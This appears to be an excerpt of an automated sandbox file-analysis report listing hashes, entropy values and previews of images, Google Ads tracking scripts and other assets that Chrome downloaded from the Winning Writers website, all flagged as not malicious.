                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 44 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3421
                                                                                                                                                                                            Entropy (8bit):7.931143314896302
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:72r40f0BXj0tUPlMgKQ10FDSf1WHZD8nZ:Crh0xQSNMgKQ10Im2
                                                                                                                                                                                            MD5:CD98D3D9CB40F1475FC2125D701ABB02
                                                                                                                                                                                            SHA1:A754CDA395400F4848430649D1022F96F74F918F
                                                                                                                                                                                            SHA-256:76D9D6671B61F367B18ABF9F6BD216136EAE063DD8258B7B8B5F359CE15A5D03
                                                                                                                                                                                            SHA-512:0548FFB53C21FC8FCE3256ABEF783A08E191CC51CA6F8D76B0DF8FD0918B340089248518B6A3FFDB2622F24A6E750C6835AAA5ED1F386F15B1D80DB54684AA78
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR...,...(.............sRGB.........gAMA......a.....pHYs..........o.d....IDATXG...x.U......$.... A.b....."E..fA?,(Ep. ....".RE..."...J..".#.T..k3.;.^B.......9....s.w^4u..x.....2.Izj....`....0....v)V|..QXXh.zr@@...}.....P}.0.)..W..".".......zc.zR.t.4m.AOH....|..@ .2...\.y.inb\2}.....O..b.WDx.....MY..s..g.(Z.K..#+..+.'.R._..#...Boh..<$.`.i.....^.$......T..5..d..Z.[.#8mA.UJ..!ui.....[.n..K@.h....D.M.-.F.+....*....Fl.....z.....=F..c......[..o.3.M....Wn.?.....=.?R..8.......9T..A..|%%%.4.....Bj.e......j..'..5.....&.....6..F!{b..VR..l..4&Y(:.Q%a6J8..2.M..t...G.eY.'}.A:..........Y{p5 ,....0.36.a;.r/...8..9J.....LL.*.J.F_.-..c......j.:......7..3..W..^....*.`B~-..3.Q....H.......C...h.!7.A....#.y...O..'-.Z7jg++.b.)K.....M....X...9....0lf#.h.#oQ....c...a..8...cE.1h.3.#....#...=.......J.nE.@E..<A.5..z.......?_.......#<X..E......|......m..YB.n..l4.......R^a7...+.RV....sV.S.%..x.W*.f....0 ......m..}..8.V .l..*..C.Z$...g.+..%...=.%O.b.I.0.[
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4941), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4941
                                                                                                                                                                                            Entropy (8bit):5.813972120242233
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUZe2etU7d5:1DY0h8Rx47OIqWbZEe2eY5
                                                                                                                                                                                            MD5:57F1292268189E0A012B61D87346E9F7
                                                                                                                                                                                            SHA1:A5A0161D9944E1671CA23459E782BD7B3122AE6F
                                                                                                                                                                                            SHA-256:5A3D725D1BC119EA63FDDBDF2C5BA5E6852C2B07F9803E00E28B6880B066EB83
                                                                                                                                                                                            SHA-512:C15AB8D89503379E8C9BB4A48C1532DD232596F036F9355AA50D12B06006C1A1E4C183C9694F54CA5ECE0D172A17C427256965ADAC60E2B522C10F7E77A15850
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960062417&cv=11&fst=1731960062417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):754
                                                                                                                                                                                            Entropy (8bit):4.316666117349511
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:If91R/lrBJz41bs+R4rBJhZBo2QfChKiOErBJz41bs+R4rBJhZBo2Qo:IxlrDc1bsJrDP6nChKjErDc1bsJrDP6g
                                                                                                                                                                                            MD5:8A46C57F8BECEB76CF12FA08279E7D7A
                                                                                                                                                                                            SHA1:D9CBA39B3415C55DF2817D952B1BFE7B3201C6D7
                                                                                                                                                                                            SHA-256:7931BD3BC1307FEFDA7F279C2D2DA50AC69BFA5B28E73B62AD0EF787A03DB6DD
                                                                                                                                                                                            SHA-512:16257DB25AC0440B4B5D18F4E079F2A42FE1F1F8A5C11E466CBF8C8BB27BF980899FE1143B554027FD04C9061C9E28BF9A6FF90080A9DE812D6AB70D9A14F3A5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.// var $ = jQuery.noConflict();..// $(document).ready(function () {..// if ($(window).width() > 499) {.// if($('.feed-height').length > 0){.// $('.feed-height').matchHeight({.// byRow: false.// });.// }.// }.// if ($(window).width() < 500) {.// $('.feed-height').matchHeight({ remove: true });.// }. .// });..// $(window).on('resize', function () {...// if ($(window).width() > 499) {.// if($('.feed-height').length > 0){.// $('.feed-height').matchHeight({.// byRow: false.// });.// }.// }.// if ($(window).width() < 500) {.// $('.feed-height').matchHeight({ remove: true });.// }..// });..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4878), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4878
                                                                                                                                                                                            Entropy (8bit):5.813037193448024
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU4e7AmtU7rW:1DY0h8Rx47OIqWbZhe7AmP
                                                                                                                                                                                            MD5:F83E64FC6275E97BCE2081746663A537
                                                                                                                                                                                            SHA1:F901D0CE1CD56ADDE3B45AC7396BE16DC94EB025
                                                                                                                                                                                            SHA-256:631B90DCB6604A5AC41A8D06C9CD3C03B5810F7B8B1E360393B0D07409CAC6FD
                                                                                                                                                                                            SHA-512:5F289C03232D092EDF54AB7D5CD76CF756EE9EFA8FABD29A4ED84616ED86333A8194791D76B109F74FFC60DA30976EAC2A02B873C48382677084BFC8FE9D2A39
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960038420&cv=11&fst=1731960038420&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):52916
                                                                                                                                                                                            Entropy (8bit):5.51283890397623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                            MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                            SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                            SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                            SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4941), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4941
                                                                                                                                                                                            Entropy (8bit):5.811094723601069
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUWeOetU7t2:1DY0h8Rx47OIqWbZ3eOeJ
                                                                                                                                                                                            MD5:E4D30A18C7628FDC61153D453F09E6AF
                                                                                                                                                                                            SHA1:4029DB23CA6E42D91263B28B81F8932B4E9EAD9D
                                                                                                                                                                                            SHA-256:334601117F52768DCA19193FCD1BC4F02C8A947DC3C994BA1C8E4210FD20F78F
                                                                                                                                                                                            SHA-512:14D6A91059C0D3D7149586B6482C8B49FE909249995A62D96BD9E8601B93CA5ED717F318EA39658D5FF34C5492C7E993429F41735A82AFD3B27E51D226394AFD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960030432&cv=11&fst=1731960030432&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960094422&cv=11&fst=1731960094422&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4880
                                                                                                                                                                                            Entropy (8bit):5.814469051799546
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUhepAmtU7m:1DY0h8Rx47OIqWbZMepAm7
                                                                                                                                                                                            MD5:A340EAD61BE9B8FB94D6BB96B1F65370
                                                                                                                                                                                            SHA1:F17CB629127EF5C98030CB1910354A7B09C33CBF
                                                                                                                                                                                            SHA-256:ECD1B880C09BD29E35EE81AC4768CE7DAA0A320E7EE8D6159898104A7981DA40
                                                                                                                                                                                            SHA-512:1C827EDFDCD40BD0D1BCF60DC617809D917BDB7E0AC6585A6E149D20796A9F9699CF48C52F4D9FA6778DBD3FB189FBEDB572E7DE8A1ADF680A61A35ADF74A8E3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960070417&cv=11&fst=1731960070417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 580 x 268, 8-bit colormap, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):29283
                                                                                                                                                                                            Entropy (8bit):7.985585050662447
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:fItkMyHsHgvdb/nfkwt4V5Ma+I3uIm+822UJ0:fI2BMHADH4PZ3uIf2UJ0
                                                                                                                                                                                            MD5:2F078897B95E7FCB6F1E93B0BBC54842
                                                                                                                                                                                            SHA1:B5D3B4F2CBB3D2CB8D52ECEE185D5961927E600B
                                                                                                                                                                                            SHA-256:EFB30BCE1EE52008949CE0B8E6DF353EF383A13BAD1D5D37C10868E18DA606C2
                                                                                                                                                                                            SHA-512:7712540FB23A20D4DC27AEFFF5B96EB1EC917D655DF228C9DACB8DE7C4D106CA88C65D3D8609BAC2B997891BE7945A23946F0791BB7CE42C067548BEB2D9C85C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/images/logo@2x.png
                                                                                                                                                                                            Preview:.PNG........IHDR...D...........Y.....tEXtSoftware.Adobe ImageReadyq.e<...hiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:0180117407206811822ABA53477E08B3" xmpMM:DocumentID="xmp.did:7F6962FA5A0B11E3A42C8A88B4C1AE94" xmpMM:InstanceID="xmp.iid:7F6962F95A0B11E3A42C8A88B4C1AE94" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0280117407206811822ABA53477E08B3" stRef:documentID="xmp.did:0180117407206811822ABA53477E08B3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..|g....PLTE....................{......)))....
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4885), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4885
                                                                                                                                                                                            Entropy (8bit):5.815799298095726
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUleQtytU7M/:1DY0h8Rx47OIqWbZceQtyn/
                                                                                                                                                                                            MD5:1A3F2F396B4479AFB3F7B7D2E33C3975
                                                                                                                                                                                            SHA1:68A7A9578C61CAD5737316C2896D2E975FE49BA9
                                                                                                                                                                                            SHA-256:174C05D76C5447E34BE26A5AB0285684C37BA7E8DC7D1826D18D4B34851C9CA5
                                                                                                                                                                                            SHA-512:9D199AD95649EE910A67DD14FF9C5251AC37D643AB990787FB56102BCF8E40015C6C89D7C483A4B66D75EE12F05A15E9BB9F87FEE1D31935F7FBBED92F6880B5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960116482&cv=11&fst=1731960116482&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):109454
                                                                                                                                                                                            Entropy (8bit):7.921174839939934
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:LG6fi71iaYPCfcZTk9GLwGV5qCpMprfPotPRQ:LG6fiMaYPecZQ9fGV5qNpPmZQ
                                                                                                                                                                                            MD5:32628DE6ED9BD0A9D0C52971A20BDC62
                                                                                                                                                                                            SHA1:B626FA702BF55B397102C635B17B6E41E6C0C9FA
                                                                                                                                                                                            SHA-256:183AD99C5B2C46A35EABA79AED68CA9CB035A674587511DC478517F1002F3448
                                                                                                                                                                                            SHA-512:9378B59EB10F09F2BB69DC5B94F000F8D2A06F564E02E0BA1C3BBC88AA26ABF79C6F93E7E6081CB0406EB642A1E2AE672806E0B4422E6E80EF7005EA1AAC2787
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
